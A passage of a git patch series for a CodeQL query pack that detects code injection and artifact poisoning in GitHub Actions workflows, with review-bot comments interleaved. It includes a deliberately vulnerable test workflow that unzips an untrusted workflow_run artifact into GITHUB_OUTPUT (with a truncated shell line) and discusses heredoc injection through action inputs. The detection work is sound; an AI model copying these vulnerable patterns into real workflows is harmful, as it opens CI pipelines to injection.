@@ -22,11 +22,11 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 9814df091dd7..d043bd930b6a 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -21,9 +21,9 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 19b007902bd0..c26862960d15 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -19,11 +19,11 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql index cd6d5eeb1089..379babf35f82 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -18,9 +18,9 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", diff --git a/ql/test/library-tests/workflowenum.expected b/ql/test/library-tests/workflowenum.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql new file mode 100644 index 000000000000..692d1eb706bc --- /dev/null +++ b/ql/test/library-tests/workflowenum.ql 
@@ -0,0 +1,8 @@ +import actions +import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions + +from + string path, string visibility, string job, string secrets_source, string permissions, + string runner +where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +select visibility, path, job, secrets_source, permissions, runner diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual rename to ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml new file mode 100644 index 000000000000..dcc80c6e74f0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml 
@@ -0,0 +1,53 @@ +name: Dependency Tree Reporter +on: + workflow_run: + workflows: [ "Dependency Tree Input Builder" ] + types: + - completed + +permissions: {} + +jobs: + compare: + permissions: + actions: read + pull-requests: write + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} From 17933cbb549184b3d4e8652104513ef3b1f3f20c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:30:22 +0200 Subject: [PATCH 212/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d4b4ca8fdeba..00b31b33bf55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.15 +version: 0.0.16 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 
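Review bot: The fixture is added without any `.expected` change (the diffstat lists only this file), so nothing asserts what the queries should say about it: the `compare` job declares `pull-requests: write` and feeds the `workflow_run` artifact through `unzip` into `$GITHUB_OUTPUT`, which is the case `PrivilegedArtifactPoisoning.ql` targets, and the job-level `isPrivileged()` introduced in this commit is what should flag it despite the top-level `permissions: {}`. Please add the expected row, or at least a comment in the fixture stating the intended verdict. The `Set needed env vars in outputs` step also looks truncated — `tmp=$(> $GITHUB_OUTPUT` is not valid bash, possibly a `<`/`>` extraction artifact; if the committed file really reads like this the step cannot be parsed and should be restored to something like `tmp=$(<pr_number.txt)` followed by `echo "pr=$tmp" >> $GITHUB_OUTPUT`.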
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 60e21004b842..dc9c140e60f3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.15 +version: 0.0.16 groups: - actions - queries From f73571a7524193b3be87e65c72815f94490ef445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 11:20:52 +0200 Subject: [PATCH 213/707] fix: fix shell comments --- action.yml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index 42141a1dd74a..9580cff83e8c 100644 --- a/action.yml +++ b/action.yml @@ -29,16 +29,25 @@ runs: shell: bash if: inputs.workflow-models run: | - // Create QLPack directory + # Create QLPack directory mkdir workflow-extpack cd workflow-extpack - // Store the extension pack file - cat > models.yml << 'EOF' + # Store the extension pack file + cat > models.json << 'EOF' ${{ inputs.workflow-models }} EOF - // Create QLPack + # Store the extension pack file + cat > models.yml << 'EOF' + extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] + EOF + + # Create QLPack cat > qlpack.yml << 'EOF' name: local/workflow-models library: true @@ -48,7 +57,7 @@ runs: - models.yml EOF - // Set env vars + # Set env vars echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV From a2ed07ec3525a4fc032f0d17a3ab9ed093bb01aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 12:43:23 +0200 Subject: [PATCH 214/707] Update scan action --- .github/action/dist/index.js | 11 ++++++++++- .github/action/package-lock.json | 14 +++++++------- .github/action/package.json | 2 +- .github/action/src/codeql.ts | 7 ++++++- action.yml | 15 +++------------ 5 files changed, 27 insertions(+), 22 deletions(-) 
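Review bot: After this change the `workflow-models` input is written to `models.json`, but the file the QLPack registers under `dataExtensions` is `models.yml`, which is hard-coded to `data: []`, so user-supplied models never reach the analysis and `models.json` is written and then ignored. Either write the input to `models.yml` or list `models.json` in the pack. The injection surface is unchanged: `${{ inputs.workflow-models }}` is still substituted into the script before bash sees the heredoc, so an input containing an `EOF` line can append arbitrary commands — move it to `env:` and write it with `printf '%s\n' "$MODELS" > models.yml`.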
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4c98f1d63012..6f4a57b10fb8 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), @@ -28706,6 +28706,15 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "") { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json index eef94f4b5cd8..9cacb7f9af9c 100644 --- a/.github/action/package-lock.json +++ b/.github/action/package-lock.json @@ -15,7 +15,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" 
@@ -195,9 +195,9 @@ } }, "node_modules/@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "dependencies": { "undici-types": "~5.26.4" @@ -520,9 +520,9 @@ } }, "@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "requires": { "undici-types": "~5.26.4" diff --git a/.github/action/package.json b/.github/action/package.json index 90512a3163ca..cd9021d20c5e 100644 --- a/.github/action/package.json +++ b/.github/action/package.json @@ -40,7 +40,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index e845ec9fd4fd..b318cb1b3e2e 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -149,7 +149,12 @@ export async function codeqlDatabaseAnalyze( const extPackPath = process.env["EXTPACK_PATH"]; const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && extPackName !== undefined) { + if ( + extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "" + ) { cmd.push("--additional-packs", extPackPath); cmd.push("--extension-packs", extPackName); } diff --git a/action.yml b/action.yml index 9580cff83e8c..addc5588b8d6 100644 --- a/action.yml +++ b/action.yml @@ -33,18 +33,9 @@ runs: mkdir workflow-extpack cd workflow-extpack - # Store the extension pack file - cat > models.json << 'EOF' - ${{ inputs.workflow-models }} - EOF - # Store the extension pack file cat > models.yml << 'EOF' - extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: workflowDataModel - data: [] + ${{ inputs.workflow-models }} EOF # Create QLPack @@ -69,7 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.extpack-path }} - EXTPACK_NAME: ${{ inputs.extpack-name }} + EXTPACK_PATH: ${{ env.EXTPACK_PATH }} + EXTPACK_NAME: ${{ env.EXTPACK_NAME }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 858df49012e2583ce58303cb74404ca9744aa2f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:08:27 +0200 Subject: [PATCH 215/707] Generate yaml file --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- action.yml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 6f4a57b10fb8..4a60299ef0fe 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
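Review bot: `EXTPACK_PATH`/`EXTPACK_NAME` are now read from the job environment (`${{ env.EXTPACK_PATH }}`), which is wider than this action's own step: any value an earlier step in the caller's job exported under the same names is forwarded to `--additional-packs`/`--extension-packs` even when `workflow-models` is empty and the processing step is skipped. Binding the hand-off to a step output keeps the contract local: give the first step `id: models`, emit `echo "extpack-path=./workflow-extpack" >> "$GITHUB_OUTPUT"` (and the name), and reference `${{ steps.models.outputs.extpack-path }}` here. A comment on the two `env:` lines noting they are empty unless `workflow-models` was supplied would also explain the `!== ""` checks added to `codeql.ts` in the first hunk.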
@@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b318cb1b3e2e..842af1c8b177 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/action.yml b/action.yml index addc5588b8d6..a9f9b2ad6cb8 100644 --- a/action.yml +++ b/action.yml @@ -52,6 +52,16 @@ runs: echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + - name: Show contents + shell: bash + run: | + echo "Directory contents" + ls -la + echo "Models" + if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + echo "QLPack" + if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + - name: Scan workflows shell: bash env: From 5cd8d70a9cfe2eb5521fd932585bf660c044ed53 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:09:06 +0200 Subject: [PATCH 216/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00b31b33bf55..f6efd7fa0f1c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.16 +version: 0.0.17 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dc9c140e60f3..9e8fdef850a6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.16 +version: 0.0.17 groups: - actions - queries From 6237a8e24cd2bda5c27d4293c4a15f3af2764ed6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:27:44 +0200 Subject: [PATCH 217/707] Update action.yml --- action.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index a9f9b2ad6cb8..4b99389767ce 100644 --- a/action.yml +++ b/action.yml @@ -28,15 +28,15 @@ runs: - name: Process workflow models shell: bash if: inputs.workflow-models + env: + DATA: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - cat > models.yml << 'EOF' - ${{ inputs.workflow-models }} - EOF + echo $DATA > models.yml # Create QLPack cat > qlpack.yml << 'EOF' @@ -55,8 +55,6 @@ runs: - name: Show contents shell: bash run: | - echo "Directory contents" - ls -la echo "Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi echo "QLPack" From 16cf60af008300fea37973242fa894d7668809b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:05:40 +0200 Subject: [PATCH 218/707] Add double quotes to env var --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index 4b99389767ce..ca9a54464343 100644 --- a/action.yml +++ b/action.yml 
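Review bot: `echo $DATA > models.yml` expands `$DATA` unquoted, so the multi-line YAML document is word-split and re-joined by single spaces onto one line, and any `*` or `?` in the models is glob-expanded against the working directory; the file written is not the input. Use `printf '%s\n' "$DATA" > models.yml`, which also avoids `echo` interpreting a value that begins with `-n` or `-e`. The patch 218 hunk on the next physical line adds the double quotes but keeps `echo`.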
@@ -29,14 +29,14 @@ runs: shell: bash if: inputs.workflow-models env: - DATA: ${{ inputs.workflow-models }} + MODELS: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - echo $DATA > models.yml + echo "$MODELS" > models.yml # Create QLPack cat > qlpack.yml << 'EOF' From 944bd84a58f61450f368bd6d035ce523b54c9629 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:15:16 +0200 Subject: [PATCH 219/707] Add missing spaces --- action.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index ca9a54464343..010e28c6a282 100644 --- a/action.yml +++ b/action.yml @@ -55,10 +55,12 @@ runs: - name: Show contents shell: bash run: | - echo "Models" + echo "##[group] Workflow Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi - echo "QLPack" + echo "##[endgroup]" + echo "##[group] QLPack" if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + echo "##[endgroup]" - name: Scan workflows shell: bash From c9b2dac128f9c885305f79867c7b8a41babc095e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 15:07:05 +0200 Subject: [PATCH 220/707] Update action.yml --- action.yml | 49 ++++++++++++------------------------------------- 1 file changed, 12 insertions(+), 37 deletions(-) diff --git a/action.yml b/action.yml index 010e28c6a282..6a1285de0dee 100644 --- a/action.yml +++ b/action.yml 
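Review bot: `##[group]` / `##[endgroup]` is the legacy runner command prefix; the documented workflow-command form is `echo "::group::Workflow Models"` and `echo "::endgroup::"`. Both forms appear to be accepted by the runner today, so this is a style point, but the `::` form is the one the docs describe and the one readers will recognise.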
@@ -5,61 +5,36 @@ inputs: token: description: GitHub Token default: ${{ github.token }} - source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." default: ${{ github.workspace }} - sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" - suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - - workflow-models: - description: "Workflow models" + workflow-extpack-path: + description: "Path to Workflow extpack" + required: false + workflow-extpack-name: + description: "Name of the Workflow extpack" required: false runs: using: 'composite' steps: - - name: Process workflow models + - name: extpack contents shell: bash - if: inputs.workflow-models env: - MODELS: ${{ inputs.workflow-models }} - run: | - # Create QLPack directory - mkdir workflow-extpack - cd workflow-extpack - - # Store the extension pack file - echo "$MODELS" > models.yml - - # Create QLPack - cat > qlpack.yml << 'EOF' - name: local/workflow-models - library: true - extensionTargets: - githubsecuritylab/actions-all: '*' - dataExtensions: - - models.yml - EOF - - # Set env vars - echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV - echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV - - - name: Show contents - shell: bash + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" - if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi echo "##[endgroup]" - name: Scan workflows 
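Review bot: `${{ intpus.workflow-extpack-path }}` in the new `env:` block is not a valid context name, so the action fails to load; the same typo appears in the `Scan workflows` hunk that follows (`@@ -70,7 +45,7 @@`). Separately, `$EXTPACK_PATH` is unquoted in `[ -f $EXTPACK_PATH/models.yml ]` and in the `cat` calls: with the input unset they test `/models.yml`, and a path containing spaces is word-split. Quote it as `"$EXTPACK_PATH/models.yml"` and gate the step with `if: inputs.workflow-extpack-path`, as the removed step was gated on `inputs.workflow-models`.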
@@ -70,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ env.EXTPACK_PATH }} - EXTPACK_NAME: ${{ env.EXTPACK_NAME }} + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From fbf03fa8e2f7de8eff01d29ef167f7d9f82fcf14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 21:51:27 +0200 Subject: [PATCH 221/707] New expression is always true tests --- .../CWE-571/.github/workflows/test.yml | 36 +++++++++++++++---- .../CWE-571/ExpressionIsAlwaysTrue.expected | 4 +++ 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 30c4dcab9320..4ed45ff973e7 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -1,12 +1,12 @@ -name: Conditionally process PR +name: Event on: - pull_request_target: - types: [opened, synchronize, reopened] + workflow_dispatch: jobs: - process-pr: + if-tests: runs-on: ubuntu-latest + permissions: {} steps: - name: Test 1 if: 1 == 2 @@ -36,10 +36,10 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - github.actor == 'torvalds' || - github.actor == 'dependabot[bot]' + 1 == 2 || + 3 == 4 }} - + - name: Test 8 run: echo "Test 8 should not be printed" if: 
> @@ -87,3 +87,25 @@ jobs: false || 1 == 2 )}} run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.event_name }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected index a8f068c9cd8d..d4c16131cc26 100644 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -5,3 +5,7 @@ | .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | | .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | | .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | 
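Review bot: Test 22 carries the same "should not be printed" label as Tests 18–21, but the `.expected` hunk adds rows only for lines 91, 94, 97 and 100, so the `if: |` block-scalar case has no expected result. If it is intended as a negative case (the block scalar without `${{ }}` is evaluated as an expression) or as a known false negative, a comment on the step such as `# not flagged: block scalar is evaluated as an expression` would make the intent explicit; if it is meant to be detected, the expected file is missing a row.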
From 0ff967b102d640c77324619f24092c6f61e9ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:07:18 +0200 Subject: [PATCH 222/707] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 6a1285de0dee..0f7b2ef49ff0 100644 --- a/action.yml +++ b/action.yml @@ -27,7 +27,7 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" From 39308fd89f2ca63366f2ad1e3a9e23d7130f15c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:09:03 +0200 Subject: [PATCH 223/707] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 0f7b2ef49ff0..35c423e103df 100644 --- a/action.yml +++ b/action.yml @@ -45,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 27d0a3406dd9fad12f1b2bcdea8634465d7bcac4 Mon Sep 17 00:00:00 2001 
